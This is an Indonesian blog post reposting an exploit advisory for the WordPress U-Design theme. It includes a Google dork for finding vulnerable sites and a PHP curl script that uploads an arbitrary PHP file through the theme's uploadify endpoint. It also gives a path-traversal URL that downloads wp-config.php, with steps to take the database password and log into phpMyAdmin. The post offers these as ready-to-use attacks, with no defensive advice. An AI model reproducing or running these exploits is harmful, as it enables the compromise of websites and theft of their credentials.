Flash Go
» » » Wordpress Themes U-Design Multiple Vulnerabilty

Wordpress Themes U-Design Multiple Vulnerabilty

Wordpress Themes U-Design Multiple Vulnerabilty - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul Wordpress Themes U-Design Multiple Vulnerabilty, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Aribitraty, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Themes U-Design Multiple Vulnerabilty
link : Wordpress Themes U-Design Multiple Vulnerabilty

Baca juga


Wordpress Themes U-Design Multiple Vulnerabilty




#-Title: Wordpress Themes U-Design Multiple Vulnerabilty
#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty

Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~

Proof Of Concept :

--
File uplod vulnerability 
--

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);



  print "$postResult";

?>

Result : Here !
--
File Download Vulnerability
--

http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.



Demikianlah Artikel Wordpress Themes U-Design Multiple Vulnerabilty

Sekianlah artikel Wordpress Themes U-Design Multiple Vulnerabilty kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Themes U-Design Multiple Vulnerabilty dengan alamat link https://minatoet.blogspot.com/2015/09/wordpress-themes-u-design-multiple.html

0 Response to "Wordpress Themes U-Design Multiple Vulnerabilty"

Post a Comment

Subscribe to: Post Comments (Atom)